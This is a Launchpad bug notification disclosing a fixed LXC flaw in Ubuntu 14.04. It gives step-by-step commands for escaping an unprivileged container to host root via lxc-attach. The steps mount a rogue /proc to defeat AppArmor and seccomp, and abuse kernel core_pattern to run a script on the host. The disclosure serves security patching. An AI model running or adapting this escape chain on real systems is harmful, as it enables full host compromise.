** Information type changed from Private Security to Public Security
--
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to lxc in Ubuntu.
https://bugs.launchpad.net/bugs/1475050
Title:
unprivileged guest to host real-root escape via lxc-attach
Status in lxc package in Ubuntu:
Fix Released
Bug description:
During LXC security analysis (see [1]) it was found, that lxc-attach
attempts to read guest mount namespace /proc entries before confining
to new apparmor policy and dropping host uid/gid. By unmounting /proc
within guest as root and replacing it with rogue version, lxc-attach
fails to apply the new security policy and also to apply
PR_SET_SECCOMP. Therefore getting "unconfined" apparmor profile
requires only single invocation of lxc-attach. The unconfined settings
already allow bind mounts, pivot_root and some other quite powerful
syscalls, so second round of lxc-attach might not be needed. Currently
second round uses host guest uid=0 process too attach to a real euid=0
process to escalate then to full host root privileges, e.g. via
modifying /proc/sys/kernel/core_pattern and triggering a core dump.
Steps to reproduce:
Get unconfined:
===============
* Use SSH to get arbitrary number of unconfined sessions,
just convenience for testing:
apt-get install openssh-server
stop ssh
Edit /etc/ssh/sshd_config to allow password login
Set root password
* Prepare to lock next lxc-attach to get "unconfined":
mount -t tmpfs tmpfs /proc/1
mknod /proc/1/status p
* Replace /bin/sh or link it to sshd instead, for testing call it
directly:
lxc-attach --name testguest /usr/sbin/sshd
* In guest make apparmor fail by second tmpfs mount:
ps aux | grep lxc-attach
pid=554
mount -t tmpfs tmpfs "/proc/${pid}/attr"
touch "/proc/${pid}/attr/current"
chmod 0666 "/proc/${pid}/attr/current"
echo "" > /proc/1/status
* Use the unconfined shells:
# cat /proc/self/attr/current
lxc-container-default (enforce)
# ssh root@localhost
...
# cat /proc/self/attr/current
unconfined
* Wait for the next lxc-attach, use unconfined to escape:
lxc-attach --name testguest /bin/true
In guest:
cat <<EOF > /escape
#!/bin/sh
echo "|/bin/sh -c /var/lib/lxc/*/rootfs/escape2" >
/proc/sys/kernel/core_pattern
EOF
chmod 0755 /escape
cat <<EOF > /escape2
#!/bin/sh
touch /this-should-be-on-outside
EOF
chmod 0755 /escape2
ps aux | grep lxc-attach
/root/Testing/PtraceHelper 2688
ulimit -c unlimited
sleep 100 &
kill -SEGV 3030
Affected system:
# lsb_release -rd
Description: Ubuntu 14.04.2 LTS
Release: 14.04
# apt-cache policy lxc
lxc:
Installed: (none)
Candidate: 1.0.7-0ubuntu0.1
Version table:
1.0.7-0ubuntu0.1 0
500 http://archive.ubuntu.com/ubuntu/ trusty-updates/main amd64
Packages
1.0.3-0ubuntu3 0
500 http://archive.ubuntu.com/ubuntu/ trusty/main amd64 Packages
[1] https://service.ait.ac.at/security/2015/LxcSecurityAnalysis.html
To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/lxc/+bug/1475050/+subscriptions
--
Mailing list: https://launchpad.net/~touch-packages
Post to : touch-packages@lists.launchpad.net
Unsubscribe : https://launchpad.net/~touch-packages
More help : https://help.launchpad.net/ListHelp
